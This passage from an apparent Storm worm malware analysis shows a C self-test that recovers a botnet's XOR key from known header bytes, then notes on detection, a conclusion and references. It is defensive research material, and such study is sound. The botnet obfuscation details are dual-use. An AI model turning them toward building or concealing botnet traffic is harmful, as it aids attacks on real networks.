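        if ((cipher[i] ^ key_out[i % XKEY_LEN]) != known_plain[i]) return 0;
    return 1;
}

/* Constructed datagram and key (not captured traffic): a bot "hello" whose
 * 8-byte type header the analyst is assumed to know from reversing. */
static const uint8_t sample_msg[] = "BOTHELLO id=2f9a port=7871";
static const uint8_t sample_key[XKEY_LEN] = { 0x5a, 0xa5, 0x3c, 0xc3 };

int xor_selftest(void)
{
    uint8_t wire[sizeof sample_msg];
    uint8_t key[XKEY_LEN];
    memcpy(wire, sample_msg, sizeof wire);
    xor_crypt(wire, sizeof wire, sample_key);

    /* a plaintext signature misses the encrypted datagram ... */
    if (signature_hit(wire, sizeof wire, "BOTHELLO")) return 0;
    /* ... but eight known header bytes give the key and the whole message */
    if (!recover_key(wire, sizeof wire, (const uint8_t *)"BOTHELLO", 8, key)) return 0;
    if (memcmp(key, sample_key, XKEY_LEN) != 0) return 0;
    xor_crypt(wire, sizeof wire, key);
    if (memcmp(wire, sample_msg, sizeof wire) != 0) return 0;
    /* a wrong header guess is rejected by the consistency check */
    xor_crypt(wire, sizeof wire, sample_key);
    if (recover_key(wire, sizeof wire, (const uint8_t *)"XXXXXXXX", 8, key)) return 0;
    return 1;
}

int main(void)
{
    printf("xor self-test %s\n", xor_selftest() ? "passed" : "FAILED");
    return 0;
}
```

For detection this means the plaintext is the wrong thing to signature: look instead at what survives the XOR, such as datagram sizes, the UDP port distribution shown below, and the fan-out to thousands of peers in a few minutes.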

Botnet Message

Well, to work against this botnet, I wrote a tool to observe the traffic and analyze the messages exchanged between the bots.


    Example: Searching other bots

    Example: Reply message


    The huge botnet

Conclusion

And that's all. From analyzing this worm, we notice that current malware looks more and more like business software. Malicious footprints are less obvious today than those of malware's ancestors. Traditional signature-based scanning can barely detect today's bad stuff, so this is a challenge for all of us.

    The purpose of most current malware is economic. The malicious author can derive financialbenefit from the spreading of the malware.

From the technology viewpoint, we find that some malware combines more than one malicious technique and has thereby become more powerful. Is this a new stage in the evolution of malware?


Future Work

As we saw, peer-to-peer botnets are more powerful and more resilient than traditional ones. I think the follow-on work will include a way of tracing peer-to-peer botnets and simulating them, to better study their resiliency.

    Resources and References

    Websense Security Labs

    [0] Do we protect against the storm worm

    http://securitylabs.websense.com/content/Blogs/2797.aspx

    [1] Storm Worm Chronology

    http://securitylabs.websense.com/content/Blogs/2822.aspx

    [2] Halloween Storm

    http://securitylabs.websense.com/content/Blogs/2855.aspx

    [3] New Storm tactic: Medical spam sites

    http://securitylabs.websense.com/content/Blogs/2902.aspx

[4] Analysis of Recent Storm Packer

http://securitylabs.websense.com/content/Blogs/3083.aspx

    [5] Unpacking Storm Worm: Code and Import Address Table onto the heap

    http://securitylabs.websense.com/content/Blogs/3127.aspx

    Others

    [6] http://en.wikipedia.org/wiki/Kademlia

    [7] http://www.barsoom.org/~agthorr/papers/infocom-2006-kad.pdf

    [8] http://xlattice.sourceforge.net/components/protocol/kademlia/specs.html

[9] The Honeynet Project - http://www.honeynet.org, February 2007.

    [10] http://www.secureworks.com/research/threats/storm-worm/?threat=storm-worm

[11] http://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt

[12] http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx

    [13] http://recon.cx/2008/a/pierre-marc_bureau/storm-recon.pdf
